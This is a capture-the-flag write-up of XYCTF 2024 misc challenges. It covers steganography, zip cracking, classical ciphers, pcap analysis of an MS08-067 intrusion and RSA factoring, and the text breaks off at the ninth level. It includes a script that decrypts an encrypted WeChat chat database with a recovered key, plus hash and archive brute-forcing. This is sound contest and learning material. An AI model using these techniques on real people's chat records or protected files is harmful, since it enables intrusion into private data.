2024XYCTF-WP

MISC

game

Google reverse image search.

Found this:

https://steamcommunity.com/sharedfiles/filedetails/?l=hungarian&id=601631716

Then click through:

[screenshot]

[screenshot]

XYCTF{Papers, Please}

[screenshot]

我的二维码为啥扫不出来? (Why can't my QR code be scanned?)

What's going on? Something seems to be wrong with my QR code. Can you help me fix it?

new

from PIL import Image
import random


def reverse_color(x):
    # invert one grayscale pixel: white (255) <-> black (0)
    return 0 if x == 255 else 255


def reverse_row_colors(pixels, row, width, block_size=10):
    # invert every 10x10 block in the given block row
    for x_block in range(width // block_size):
        x = x_block * block_size
        y = row * block_size
        for x_small in range(x, x + block_size):
            for y_small in range(y, y + block_size):
                pixel = pixels[x_small, y_small]
                pixels[x_small, y_small] = reverse_color(pixel)


def reverse_col_colors(pixels, col, height, block_size=10):
    # invert every 10x10 block in the given block column
    for y_block in range(height // block_size):
        x = col * block_size
        y = y_block * block_size
        for x_small in range(x, x + block_size):
            for y_small in range(y, y + block_size):
                pixel = pixels[x_small, y_small]
                pixels[x_small, y_small] = reverse_color(pixel)


original_img = Image.open("flag.png")

new_img = original_img.copy()

width, height = new_img.size
pixels = new_img.load()

count = 0

# seven times: pick a random row or column and invert it
while count < 7:
    x = random.randint(0, 1)
    if x == 0:
        reverse_col_colors(pixels, random.randint(0, height // 10 - 1), height)
    else:
        reverse_row_colors(pixels, random.randint(0, width // 10 - 1), width)
    count += 1

new_img.save("new.png")

Reading the script: it inverts the black/white of one random row or column, seven times in total.

Looking at the QR code, the four corners can be repaired first:

reverse_col_colors(pixels, 0, height)
reverse_row_colors(pixels, 1, width)
reverse_col_colors(pixels, 2, height)
reverse_col_colors(pixels, 5, height)

The remaining 3 flips can simply be brute-forced (too few flips; there should have been more). The proper way to find them is the timing patterns, which always alternate black and white.

[screenshot]

from PIL import Image

# reverse_col_colors / reverse_row_colors are the functions from the challenge script above
original_img = Image.open("new.png")
new_img = original_img.copy()
width, height = new_img.size
pixels = new_img.load()
# the five inverted columns and two inverted rows (block indices)
reverse_col_colors(pixels, 0, height)
reverse_col_colors(pixels, 2, height)
reverse_col_colors(pixels, 5, height)
reverse_col_colors(pixels, 10, height)
reverse_col_colors(pixels, 11, height)
reverse_row_colors(pixels, 1, width)
reverse_row_colors(pixels, 12, width)
new_img.save("flag.png")

flag{qR_c0d3_1s_s0_fun}
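To locate the flips without guessing, the timing patterns can be checked programmatically. The following is an added example, not part of the original writeup: it works on a QR module grid (1 = dark, 0 = light) with the quiet zone already cropped, so the timing patterns sit in row 6 and column 6; `find_flipped_lines`, `flip_lines`, `repair` and `make_demo_grid` are my own names, and the grid is constructed.

```python
# Added example (not from the original writeup): find inverted rows/columns of a QR
# module grid from its timing patterns, which must alternate dark/light.
# Assumes the grid is already cut into modules (1 = dark, 0 = light) with the quiet
# zone cropped off, so both timing patterns sit at index 6 in every QR version.
TIMING = 6


def expected_timing(i):
    """Timing-pattern module at index i: dark on even indices, light on odd ones."""
    return 1 if i % 2 == 0 else 0


def find_flipped_lines(grid):
    """Return (flipped_rows, flipped_cols) as sets, inferred from timing violations.

    A flipped column c shows up as a wrong module at (TIMING, c); a flipped row r
    as a wrong module at (r, TIMING). If the timing row itself was inverted, almost
    every module in it is wrong; a majority of violations therefore means "the timing
    line itself flipped", and the few modules that still match were hit twice, i.e.
    their own line flipped as well. Assumes fewer than half the lines were flipped.
    """
    size = len(grid)
    col_bad = {c for c in range(size) if grid[TIMING][c] != expected_timing(c)}
    row_bad = {r for r in range(size) if grid[r][TIMING] != expected_timing(r)}
    rows, cols = set(), set()
    if len(col_bad) > size // 2:
        rows.add(TIMING)
        cols.update(c for c in range(size) if c not in col_bad)
    else:
        cols.update(col_bad)
    if len(row_bad) > size // 2:
        cols.add(TIMING)
        rows.update(r for r in range(size) if r not in row_bad)
    else:
        rows.update(row_bad)
    return rows, cols


def flip_lines(grid, rows=(), cols=()):
    """Return a copy with the given rows and columns inverted (a double hit cancels)."""
    out = [row[:] for row in grid]
    for r in rows:
        out[r] = [1 - v for v in out[r]]
    for c in cols:
        for r in range(len(out)):
            out[r][c] = 1 - out[r][c]
    return out


def repair(grid):
    """Undo the detected flips; inverting a line is its own inverse."""
    rows, cols = find_flipped_lines(grid)
    return flip_lines(grid, rows, cols)


def make_demo_grid(size=21):
    """Constructed version-1-sized grid: real timing patterns, deterministic filler elsewhere."""
    grid = [[1 if (r * c + r) % 3 == 0 else 0 for c in range(size)] for r in range(size)]
    for i in range(size):
        grid[TIMING][i] = expected_timing(i)
        grid[i][TIMING] = expected_timing(i)
    return grid


if __name__ == "__main__":
    clean = make_demo_grid()
    # the seven flips the writeup ended up with: rows 1 and 12, columns 0, 2, 5, 10, 11
    scrambled = flip_lines(clean, rows=(1, 12), cols=(0, 2, 5, 10, 11))
    print(find_flipped_lines(scrambled))  # ({1, 12}, {0, 2, 5, 10, 11})
    print(repair(scrambled) == clean)     # True
```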

zzl的护理小课堂 (zzl's nursing mini-class)

Tired from studying security? zzl says here are a few nursing questions to help you relax.

[screenshot]

Scoring 100 on the quiz achieves nothing.

Look at the source:

document.getElementById('quizForm').addEventListener('submit', function(event) {
    event.preventDefault();

    var formData = new FormData(this);

    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'getScore.php', true);
    xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
            var score = xhr.responseText;
            if (score == 100) {
                document.getElementById('scoreDisplay').innerText = "你的分数是: " + score + "/100 杂鱼,怎么才100分啊";
            } else if (score < 100) {
                document.getElementById('scoreDisplay').innerText = "你的分数是: " + score + "/100 noooooob!!";
            } else {
                var flagXhr = new XMLHttpRequest();
                flagXhr.open('GET', 'flag.php', true);
                flagXhr.onreadystatechange = function() {
                    if (flagXhr.readyState === 4 && flagXhr.status === 200) {
                        var flag = flagXhr.responseText;
                        document.getElementById('scoreDisplay').innerText = "Flag: " + flag;
                    }
                };
                flagXhr.send(); // send the request that fetches the flag
            }
        }
    };
    xhr.send(formData); // send the request that fetches the score
});

Try visiting flag.php directly:

[screenshot]

It has to be read through the page's own XMLHttpRequest object (which acts like an inner class). Find the code in the source that outputs the result, change the document part to an alert for front-end output if you like, and paste the code below into the console:

var flagXhr = new XMLHttpRequest();
flagXhr.open('GET', 'flag.php', true);
flagXhr.onreadystatechange = function() {
    if (flagXhr.readyState === 4 && flagXhr.status === 200) {
        var flag = flagXhr.responseText;
        document.getElementById('scoreDisplay').innerText = "Flag: " + flag;
    }
};
flagXhr.send();

[screenshot]

XYCTF{Zz1_73IL_YoU_86ed16d55aeb}

ez_隐写 (ez steganography)

ez steganography, so no hints.

[screenshot]

It's ZIP pseudo-encryption (the encryption flag is set, but the data isn't actually encrypted).

Fix that.

hint.png turns out to be broken.

[screenshot]

Then run binwalk on the archive to carve out the embedded file.

It still won't open.

[screenshot]

5120X2880_2_3_8

The password is 20240401.

After extracting:

WATERMARK

[screenshot]

XYCTF{159-WSX-IJN-852}

[screenshot]

熊博士 (Dr. Bear)

While playing in the forest, Bear Big and Bear Two picked up a little note. It may concern the forest's safety, but they can't read the writing. Can you help them work out what these mysterious characters mean?

# 小纸条.txt
CBXGU{ORF_BV_NVR_BLF_CRZL_QQ}

The challenge name 熊博士 (Dr. Bear) brings to mind Dr. 熊菲特 and the Atbash cipher.

[screenshot]

XYCTF{liu_ye_mei_you_xiao_jj}

ZIP神之套 (nested ZIP hell)

ZIP神之套>这玩意咋打不开呢.exe
xyctf????????ftcyx

At first I tried a mask attack assuming a palindrome, but that didn't work.

Then I realised the 8 unknowns are digits: an earlier challenge hinted at it, and it's the XYCTF start date.

Password: xyctf20240401ftcyx

Extracting gives flag.zip and 套.zip.

[screenshot]

A known-plaintext attack suggests itself.

Using arch:

[screenshot]

Extracting gives flag.md.

[screenshot]

XYCTF{1A4B8-C9D2F3E-6A4B8C-9D2F3E7F}

出题有点烦 (Setting challenges is a pain)

Setting a challenge is so hard, I'll just throw one together.

[screenshot]

Unzipping reveals five images.

Opening the fifth image in 010 Editor shows a zip appended at the very end. Extract it, find it's password-protected, and brute-force it again.

[screenshot]

The real flag: XYCTF{981e5_f3ca30_c841487_830f84_fb433e}

真>签到

[screenshot]

XYCTF{59bd0e77d13c_1406b23219e_f91cf3a_153e8ea4_77508ba}

彩蛋? (Easter egg?)

This platform has things hidden in a few places. Can you find them?

The flag has more than two parts.

https://www.xyctf.top/posts/c4584857

[screenshot]

130131103124106173164150151163137141137

This is octal.

[screenshot]

XYCTF{this_a_

Tail:

[screenshot]

1100110 1101001 1101110 1100100 1011111 1101001 1110100 1111101

Binary to characters: find_it}

But it seems there are three parts?

Download the poster.

It turns out to be a RIFF file.

https://convertio.co/zh/png-converter/

Convert it to PNG.

[screenshot]

What keyboard : xn0jtxgoy.p{urp{lbi{abe{c{ydcbt{frb{jab{

Something is there: a keyboard-layout cipher, decoded with the Dvorak layout.

Search online: qwerty to dvorak convert

http://wbic16.xedoloh.com/dvorak.html

bl0ckbuster_for_png_and_i_think_yon_can_

XYCTF{this_a_bl0ckbuster_for_png_and_i_think_yon_can_find_it}

baby_AIO

Surely a challenge this simple can't stump you ₍ᐢ..ᐢ₎♡

Difficulty: mid

TCPL

Just run it and the flag appears; how could your bros from 都坤吧 ever lie to you? Format: FLAG{}

网络追踪 (Network tracing)

A hacker called JFTQ used some unknown method to break into a not-so-secure system. Clever CTFer, do you know how he did it?

Follow the last TCP stream.

[screenshot]

This is xxencode.

[screenshot]

XYCTF{fake_flag}
Real flag format: XYCTF{target IP_ports nmap found open on the target (largest to smallest, joined with _)_CVE id of the vulnerability used to get the target's shell}
Example: XYCTF{1.1.1.1_888_88_8_CVE-2009-3103}

[screenshot]

[screenshot]

https://blog.csdn.net/qq_58784379/article/details/120077204

XYCTF{192.168.204.133_445_139_135_CVE-2008-4250}

Question 1: the target's IP address

Look at the start of the capture: this is the IP scanning phase. The IP after "Tell" in the ARP requests is clearly the attacker's: 192.168.204.131.

[screenshot]

Further on, two IPs keep talking to each other. One is the attacker; the other, 192.168.204.133, is the target.

Question 2: the ports nmap found open on the target

A very common question; it tests the TCP three-way handshake.

TCP three-way handshake
First: the client sends a SYN packet.
Second: the server receives the SYN and sends its own SYN together with the acknowledgement, i.e. a SYN+ACK packet, entering the SYN_RECV state.
Third: the client receives the server's packet and replies with an ACK, completing the handshake.

So the SYN flag means connection setup and ACK means a response. An open port will certainly answer with the ACK flag set, so finding the open ports means finding those ACK (SYN+ACK) replies.

Method 1: filter directly in Wireshark:

ip.src == 192.168.204.133 && tcp.flags.syn == 1 && tcp.flags.ack == 1

[screenshot]

Three open ports: 445, 139, 135.

Method 2: filter with tcpdump:

tcpdump -n -r 1.pcapng 'ip src 192.168.204.133 and tcp[13] = 18' | awk '{print $3}' | sort -u

[screenshot]

Question 3: the CVE of the vulnerability used to get the target's shell

As noted above, the last TCP stream in the capture shows the commands run after the shell was obtained; it is packet 9438, stream 4147.

So the preceding stream, 4146, is the one that attacked the target and got the shell.

There are several approaches. First determine the target's operating system, which we can do via SMB: the nearest packet, 9364, is a Session Setup AndX Response whose Native OS field is Windows 5.1 and whose Native LAN Manager field is Windows 2000 LAN Manager, which identifies Windows XP.

[screenshot]

Looking at the previous stream, 4146, the attack consists of many connection attempts to port 445, sending the same malicious RPC packet over each connection.

Windows XP plus that flood of connections to port 445 points to the most common Windows XP vulnerability, MS08-067.

Looking up its CVE number: CVE-2008-4250.
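The same SYN+ACK test that the tcpdump expression `tcp[13] = 18` performs (byte 13 of the TCP header is the flags byte; SYN = 0x02, ACK = 0x10, so 18 = SYN|ACK), written out as an added example that is not part of the original writeup. The packet records are constructed (src, dst, sport, dport, flags) tuples standing in for what a pcap parser would yield; `open_ports`, `closed_ports` and `format_flag` are my own names.

```python
# Added example (not from the original writeup): classify a port scan's replies from the
# TCP flags byte, the same check as tcpdump's 'tcp[13] = 18' (0x12 = SYN|ACK).
# Packets are constructed (src_ip, dst_ip, src_port, dst_port, flags) tuples; a pcap
# parser such as scapy or dpkt would supply the same fields from a real capture.
SYN = 0x02
RST = 0x04
ACK = 0x10


def is_synack(flags):
    """The second step of the handshake: exactly SYN and ACK set (18 decimal)."""
    return flags == SYN | ACK


def open_ports(packets, target_ip):
    """Ports on target_ip that answered a probe with SYN+ACK, largest first (flag order)."""
    ports = {sport for src, _dst, sport, _dport, flags in packets
             if src == target_ip and is_synack(flags)}
    return sorted(ports, reverse=True)


def closed_ports(packets, target_ip):
    """Ports that answered RST+ACK (0x14): the host is up but nothing listens there."""
    ports = {sport for src, _dst, sport, _dport, flags in packets
             if src == target_ip and flags == RST | ACK}
    return sorted(ports, reverse=True)


def format_flag(target_ip, ports, cve):
    """Assemble the challenge's answer: XYCTF{ip_ports-descending_CVE}."""
    return "XYCTF{" + "_".join([target_ip] + [str(p) for p in ports] + [cve]) + "}"


ATTACKER = "192.168.204.131"   # addresses from the writeup
TARGET = "192.168.204.133"

# Constructed sample capture: three open ports, one closed, one that never answers.
SAMPLE = [
    (ATTACKER, TARGET, 40001, 135, SYN),
    (TARGET, ATTACKER, 135, 40001, SYN | ACK),
    (ATTACKER, TARGET, 40001, 135, ACK),
    (ATTACKER, TARGET, 40002, 139, SYN),
    (TARGET, ATTACKER, 139, 40002, SYN | ACK),
    (ATTACKER, TARGET, 40003, 445, SYN),
    (TARGET, ATTACKER, 445, 40003, SYN | ACK),
    (ATTACKER, TARGET, 40003, 445, ACK),
    (ATTACKER, TARGET, 40004, 80, SYN),
    (TARGET, ATTACKER, 80, 40004, RST | ACK),   # closed port
    (ATTACKER, TARGET, 40005, 3389, SYN),       # no reply: filtered
]

if __name__ == "__main__":
    ports = open_ports(SAMPLE, TARGET)
    print(ports)                                         # [445, 139, 135]
    print(format_flag(TARGET, ports, "CVE-2008-4250"))   # the writeup's answer
```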

疯狂大杂烩!九转功成 (Crazy mix! Nine turns to completion)

Can you break through the nine levels and become an immortal?

The archive password is the competition name plus 8 digits of something... forgot what. Hahaha!

Flag format: XYCTF{md5(flag)}

Level 3 is not 夏多; look at the intersections.

Level 6 is keyboard drawing; the latest 狼蛛 keyboard, you deserve one!

Password: XYCTF20240401

Extracting gives:

故事背景.txt

In ancient times, cultivation was divided into nine stages: Qi Refining, Foundation Establishment, Core Formation, Nascent Soul, Spirit Transformation, Void Refining, Integration, Mahayana and Tribulation. Many ambitious young people longed to reach the pinnacle of immortality, but for ordinary people Qi Refining is the prerequisite for even qualifying. Only by crossing every hardship step by step will you finally ascend. If you want the flag that is yours, start from Qi Refining and break through slowly!! Young one, it's not that this old man looks down on you, but think carefully about whether you really want to climb to that ethereal immortal realm.

第一层:炼气 (Level 1: Qi Refining)

First extract 炼气.

hint1.txt

What is this?
曰:玉魔命灵天观罗炁观神冥西道地真象茫华茫空吉清荡罗命色玉凶北莽人鬼乐量西北灵色净魂地魂莽玉凶阿人梵莽西量魄周界

天书 (曰) decode: First_layer_simple

That gives the archive password.

Extract 阿豆.zip.

[screenshot]

There seems to be something at the feet.

Fix the image height.

阿豆_4836

Got the flag:

XYCTF{T3e_c0mb1nation_

第二层:筑基 (Level 2: Foundation Establishment)

hint2.txt

xihak-minoh-zusok-humak-zurok-gulyk-somul-nenel-dalek-nusyh-zumek-sysuk-zelil-fepak-tysok-senax

BubbleBabble decode: The_second_layer_is_also_simple

Extract hahaha.zip

to get:

[screenshot]

[screenshot]

flag2:0f_crypt0_and_
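For readers who would rather not paste hints into a web tool, here is an added Bubble Babble decoder (not part of the original writeup) that also verifies the encoding's running checksum, so a corrupted or hand-altered string is rejected instead of silently producing wrong bytes; `bubblebabble_decode` and `BubbleBabbleError` are my own names.

```python
# Added example (not from the original writeup): Bubble Babble decoder with checksum
# verification. Format: 'x' + repeated 'vowel consonant vowel consonant - consonant'
# (two bytes each) + a final 'vowel consonant vowel' (one byte, or only the checksum) + 'x'.
VOWELS = "aeiouy"
CONSONANTS = "bcdfghklmnprstvzx"


class BubbleBabbleError(ValueError):
    """Raised for malformed input or a checksum mismatch."""


def _vowel(ch):
    if ch not in VOWELS:
        raise BubbleBabbleError(f"expected a vowel, got {ch!r}")
    return VOWELS.index(ch)


def _consonant(ch):
    # 'x' (index 16) only appears as the frame marker or in the final checksum triple
    if ch not in CONSONANTS[:16]:
        raise BubbleBabbleError(f"unexpected consonant {ch!r}")
    return CONSONANTS.index(ch)


def _decode_3(a, b, c, chk):
    """Rebuild one byte from a 'vowel consonant vowel' triple given the running checksum.

    The encoder mixed the checksum into the two 2-bit fields: a = (hi + chk) % 6 and
    c = (lo + chk // 6) % 6, so after undoing that both fields must be below 4.
    """
    hi = (a - chk % 6) % 6
    lo = (c - chk // 6) % 6
    if hi >= 4 or lo >= 4:
        raise BubbleBabbleError("checksum mismatch")
    return (hi << 6) | (b << 2) | lo


def bubblebabble_decode(text):
    """Decode a Bubble Babble string to bytes, validating structure and checksum."""
    if len(text) < 5 or text[0] != "x" or text[-1] != "x":
        raise BubbleBabbleError("must start and end with 'x'")
    body = text[1:-1]
    if len(body) % 6 != 3:
        raise BubbleBabbleError("bad length")
    chk = 1
    out = bytearray()
    for i in range(len(body) // 6):
        t = body[6 * i:6 * i + 6]
        if t[4] != "-":
            raise BubbleBabbleError("missing dash")
        byte1 = _decode_3(_vowel(t[0]), _consonant(t[1]), _vowel(t[2]), chk)
        byte2 = (_consonant(t[3]) << 4) | _consonant(t[5])
        out += bytes([byte1, byte2])
        chk = (chk * 5 + byte1 * 7 + byte2) % 36
    t = body[-3:]
    a, c = _vowel(t[0]), _vowel(t[2])
    if t[1] == "x":
        # even-length data: the last triple carries only the checksum
        if a != chk % 6 or c != chk // 6:
            raise BubbleBabbleError("final checksum mismatch")
    else:
        out.append(_decode_3(a, _consonant(t[1]), c, chk))
    return bytes(out)


if __name__ == "__main__":
    hint2 = ("xihak-minoh-zusok-humak-zurok-gulyk-somul-nenel-"
             "dalek-nusyh-zumek-sysuk-zelil-fepak-tysok-senax")
    print(bubblebabble_decode(hint2))  # b'The_second_layer_is_also_simple'
```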

第三层:结丹 (Level 3: Core Formation)

hint3

At first I took it for a 夏多 cipher (also called the zigzag cipher):

[screenshot]

Decoding gives:

ukijhgminhgvtjwkxbhjihdigcjuhkyii

But that password was wrong.

Then I remembered a civil-service exam question about intersections.

And the hint says it plainly: look at the intersections. What was I thinking.

From the picture the marks fall into three kinds: a straight line, three lines, and a right angle,

corresponding to Morse's dot, dash and space:

- .... . ..--.- - .... .. .-. -..

THE_THIRD
the_third

Extracting 第三层.zip gives two files: flag.txt is empty, and flag.zip is an encrypted archive whose hex contains a string.

[screenshot]

[screenshot]

Extracting gives flag.txt:

MZWGCZZT566JU3LJONRV6MLTL5ZGKNTMNR4V6ZTVNYQSC===

[screenshot]

flag3:misc_1s_re6lly_fun!!

第四层:元婴 (Level 4: Nascent Soul)

hint.txt

It's 2024; surely nobody still can't solve U2FsdGVkX1+y2rlJZlJCMnvyDwHwzkgHvNsG2TF6sFlBlxBs0w4EmyXdDe6s7viL, right?

Base64-decoding it reveals a salt header, so I suspected AES.

Key: 2024

https://www.metools.info/code/c27.html

[screenshot]

The_fourth_floor_is_okay

Extract 第四层.zip

hint.txt

wqk:1m813onn17o040358p772q37rm137qpnqppqpn38nr704m56n2m9q22po7r05r77

Caesar decode:

mode1 #12: key:1a813cbb17c040358d772e37fa137edbeddedb38bf704a56b2a9e22dc7f05f77

MSG0.db is a database file that won't open. Searching shows it is an encrypted WeChat chat-record database. Decrypt it with the key found above using a script:

input_pass = '1a813cbb17c040358d772e37fa137edbeddedb38bf704a56b2a9e22dc7f05f77'
input_dir = r'D:\UserData\Desktop\XYCTF\MISC\疯狂大杂烩!九转功成\修仙传\元婴\第四层\第四层'
import ctypes
import hashlib
import hmac
from pathlib import Path
from Crypto.Cipher import AES

SQLITE_FILE_HEADER = bytes('SQLite format 3', encoding='ASCII') + bytes(1)
IV_SIZE = 16
HMAC_SHA1_SIZE = 20
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
password = bytes.fromhex(input_pass.replace(' ', ''))


def decode_one(input_file):
    input_file = Path(input_file)
    with open(input_file, 'rb') as f:
        blist = f.read()
    print(len(blist))
    # the first 16 bytes of the file are the salt; derive the page key from it
    salt = blist[:16]
    key = hashlib.pbkdf2_hmac('sha1', password, salt, DEFAULT_ITER, KEY_SIZE)
    first = blist[16:DEFAULT_PAGESIZE]
    # the HMAC key is derived from the page key with a modified salt
    mac_salt = bytes([x ^ 58 for x in salt])
    mac_key = hashlib.pbkdf2_hmac('sha1', key, mac_salt, 2, KEY_SIZE)
    hash_mac = hmac.new(mac_key, digestmod='sha1')
    hash_mac.update(first[:-32])
    hash_mac.update(bytes(ctypes.c_int(1)))  # page number 1
    if hash_mac.digest() == first[-32:-12]:
        print('Decryption Success')
    else:
        print('Password Error')
    # remaining pages, each DEFAULT_PAGESIZE bytes
    blist = [
        blist[i:i + DEFAULT_PAGESIZE]
        for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)
    ]
    with open(input_file.parent / f'decoded_{input_file.name}', 'wb') as f:
        f.write(SQLITE_FILE_HEADER)
        # each page: AES-CBC body, then 16-byte IV, 20-byte HMAC and 12 bytes of padding
        t = AES.new(key, AES.MODE_CBC, first[-48:-32])
        f.write(t.decrypt(first[:-48]))
        f.write(first[-48:])
        for i in blist:
            t = AES.new(key, AES.MODE_CBC, i[-48:-32])
            f.write(t.decrypt(i[:-48]))
            f.write(i[-48:])


if __name__ == '__main__':
    input_dir = Path(input_dir)
    for f in input_dir.glob('*.db'):
        decode_one(f)

Open it in Navicat:

[screenshot]

flag4:L1u_and_K1cky_Mu

第五层:化神 (Level 5: Spirit Transformation)

hint.txt

enc = 'key{liu*****'
md5 = '87145027d8664fca1413e6a24ae2fbe7'

Evidently we have to recover the plaintext from its MD5, which can be brute-forced. Guess that the last * is }, then brute-force the rest:

import hashlib

enc = 'key{liu'
md5 = '87145027d8664fca1413e6a24ae2fbe7'

# four unknown characters between 'key{liu' and the closing brace: try every code point for each
for x in range(0, 127):
    for y in range(0, 127):
        for z in range(0, 127):
            for k in range(0, 127):
                candidate = enc + chr(x) + chr(y) + chr(z) + chr(k) + "}"
                temp2 = hashlib.md5(candidate.encode("utf-8")).hexdigest()
                if md5 == temp2:
                    print(candidate)
# key{liuyyds}

Extracting gives flag.txt and serpent.txt.

flag.txt yields nothing. The other file's name shows it is Serpent stego; the password is liuyyds.

http://serpent.online-domain-tools.com/

[screenshot]

[screenshot]

https://www.mzy0.com/ctftools/zerowidth1/

[screenshot]

_3re_so_sm4rt!

第六层:炼虚 (Level 6: Void Refining)

hint6.txt

wszrdc
fgtrfvb
ghytgbn
rfctg
yhju
frtg
uyhbghj
6yhn
uyhjujmn
tgvvghb
yhnmghj
4rfv
derf
iujkikmn

Keyboard-drawing cipher: tracing each line's letters across the keyboard draws the password: keeponfighting

Extracting gives:

[screenshot]

All fake flags, but there is a yuanshen.jpg.

steghide extract -sf yuanshen.jpg
Enter passphrase: 98641
wrote extracted data to "flag.txt".

In_just_a_few_m1nutes_

第七层:合体 (Level 7: Integration)

hint7.txt

Ciphertext: Tig+AF8-viakubq+AF8-vphrz+AF8-xi+AF8-uayzdyrjs

I hear the Vigenère key is "大残"

First UTF-7 decode the ciphertext; anyone familiar with this encoding recognises it at a glance.

Tig_viakubq_vphrz_xi_uayzdyrjs

The next step is rather novel. We know a Vigenère key consists of letters, so "大残" means select all. Anyone who did BUU's NewStar should remember a misc challenge there where the R channel was "大残".

[screenshot]

Archive password: The_seventh_level_is_difficult

Extracting gives:

[screenshot]

Next, look up the number for each colour:

164 150 145 171 137 167 145 162 145 137 164 150 162 60 165 147 150 41

These numbers are octal. Converting octal to characters with 随波逐流 gives the flag:

they_were_thr0ugh!

第八层:大乘 (Level 8: Mahayana)

# hint8.py

from Crypto.Util.number import bytes_to_long, getPrime
flag=b"password{xxxxx}"
p,q= getPrime(1024),getPrime(1024)
n = p * q
e = 65537
m = bytes_to_long(flag)
c = pow(m,e,n)
print("n=",n)
print("c=",c)
print("p^q=",p^q)
'''
n= 22424440693845876425615937206198156323192795003070970628372481545586519202571910046980039629473774728476050491743579624370862986329470409383215065075468386728605063051384392059021805296376762048386684738577913496611584935475550170449080780985441748228151762285167935803792462411864086270975057853459586240221348062704390114311522517740143545536818552136953678289681001385078524272694492488102171313792451138757064749512439313085491407348218882642272660890999334401392575446781843989380319126813905093532399127420355004498205266928383926087604741654126388033455359539622294050073378816939934733818043482668348065680837
c= 1400352566791488780854702404852039753325619504473339742914805493533574607301173055448281490457563376553281260278100479121782031070315232001332230779334468566201536035181472803067591454149095220119515161298278124497692743905005479573688449824603383089039072209462765482969641079166139699160100136497464058040846052349544891194379290091798130028083276644655547583102199460785652743545251337786190066747533476942276409135056971294148569617631848420232571946187374514662386697268226357583074917784091311138900598559834589862248068547368710833454912188762107418000225680256109921244000920682515199518256094121217521229357
p^q= 14488395911544314494659792279988617621083872597458677678553917360723653686158125387612368501147137292689124338045780574752580504090309537035378931155582239359121394194060934595413606438219407712650089234943575201545638736710994468670843068909623985863559465903999731253771522724352015712347585155359405585892

'''

An ordinary pruning algorithm; exp:

from Crypto.Util.number import *
import gmpy2
import sys  # for the recursion limit
sys.setrecursionlimit(3000)  # raise the default recursion depth to 3000 (one frame per bit)

n = 22424440693845876425615937206198156323192795003070970628372481545586519202571910046980039629473774728476050491743579624370862986329470409383215065075468386728605063051384392059021805296376762048386684738577913496611584935475550170449080780985441748228151762285167935803792462411864086270975057853459586240221348062704390114311522517740143545536818552136953678289681001385078524272694492488102171313792451138757064749512439313085491407348218882642272660890999334401392575446781843989380319126813905093532399127420355004498205266928383926087604741654126388033455359539622294050073378816939934733818043482668348065680837
seed = 14488395911544314494659792279988617621083872597458677678553917360723653686158125387612368501147137292689124338045780574752580504090309537035378931155582239359121394194060934595413606438219407712650089234943575201545638736710994468670843068909623985863559465903999731253771522724352015712347585155359405585892
# seed is p^q

def findp(p, rp):
    # p holds the low bits of the candidate prime as a binary string; extend it one bit at a
    # time and keep only those prefixes for which p*q agrees with n modulo 2^l
    l = len(p)
    if l == 1024:
        rp.append(int(p, 2))
    else:
        pp = int(p, 2)
        qq = (seed ^ pp) % 2 ** l  # the low bits of q follow from p ^ q
        if pp * qq % 2 ** l == n % 2 ** l:
            findp('1' + p, rp)
            findp('0' + p, rp)


rp = []
findp('1', rp)  # both primes are odd, so the lowest bit is 1
for i in rp:
    if n % i == 0 and isPrime(int(i)):
        print(i)
#145805499551351837545170670839798336872366414383311042018386386595288060139791135454980413014693924866953972662266748526407954492877610429602886244372924035960962307198910659475639333945895922717307291255423855616274924584270570126180050363106535962473049107576556315461013755859097114552522187755171423621071
#153796947048270429510444756458855481287460639468563001213489907625132438953570738468181770925091867439727519074685449940618659583114338501872698220745473531199063071421852521618805765627999106188015431567625318850899895052130157037822960945909520973243793507740817436707504505709194025074527084803054107605547


p=145805499551351837545170670839798336872366414383311042018386386595288060139791135454980413014693924866953972662266748526407954492877610429602886244372924035960962307198910659475639333945895922717307291255423855616274924584270570126180050363106535962473049107576556315461013755859097114552522187755171423621071
q=n//p
c=1400352566791488780854702404852039753325619504473339742914805493533574607301173055448281490457563376553281260278100479121782031070315232001332230779334468566201536035181472803067591454149095220119515161298278124497692743905005479573688449824603383089039072209462765482969641079166139699160100136497464058040846052349544891194379290091798130028083276644655547583102199460785652743545251337786190066747533476942276409135056971294148569617631848420232571946187374514662386697268226357583074917784091311138900598559834589862248068547368710833454912188762107418000225680256109921244000920682515199518256094121217521229357
e=65537
phi = (p-1) * (q-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
#password{pruning_algorithm}

Extracting gives a txt file made of "no" and "yes". That suggests 0/1 pixel drawing: no = 0, yes = 1.

But we need the image dimensions. Looking at the archive's tail in 010 Editor:

[screenshot]

Base64-decoding it gives:

波逐流洪流波波洪流波随洪流逐随浪流波波流洪流波流洪流随逐洪逐随随浪波逐波逐浪波逐流随浪波逐随波浪波逐波流洋波逐逐随随流流随洋波波流流随随流流洋波随流流逐随逐流洋波波逐波逐随随逐洋流流流流随波逐逐浪波随随波浪波逐随波洪流随波浪波逐随波浪波逐随波浪波波流流浪波逐随波洪流随波浪波逐随波浪波波流流浪波逐随波浪波逐随波浪波逐随波浪波波流流浪波逐随波浪波逐随波

随言随语

548×72, flag format e.g. Aa1aa_a1a_aaa_aa

With the dimensions and the flag format, draw the image:

Fill in the 0/1 string:

from PIL import Image

MAX1 = 548
MAX2 = 72
pic = Image.new("RGB", (MAX1, MAX2))
# paste the 0/1 string here (no = 0, yes = 1): MAX1 * MAX2 characters, row by row
bits = ""
i = 0
for y in range(0, MAX2):
    for x in range(0, MAX1):
        if bits[i] == '1':
            pic.putpixel((x, y), (0, 0, 0))
        else:
            pic.putpixel((x, y), (255, 255, 255))
        i = i + 1
pic.show()
pic.save("flag.png")

[screenshot]

What is this? It looks like some kind of script. A Baidu search shows it is the Sumeru desert script (须弥沙漠文).

https://mbd.baidu.com/newspage/data/dtlandingsuper?nid=dt_4594772936259849248

[screenshot]

Matching the glyphs against the table, and using the flag format, gives: Sm3rt_y0u_can_do

第九层:渡劫 (Level 9: Tribulation)

# hint9.py

from Crypto.Util.number import *
from random import randint

p = getPrime(512)
q = getPrime(512)
n = p * q
e = 65537

list = []
for _ in range(2):
    a, b = randint(0, 2**8), randint(0, 2**256)
    list.append(a * p + b * q)

password = b"xxxxx"
c = pow(bytes_to_long(password), e, n)
print(f'{n = }')
print(f'{c = }')
print(f'{list = }')


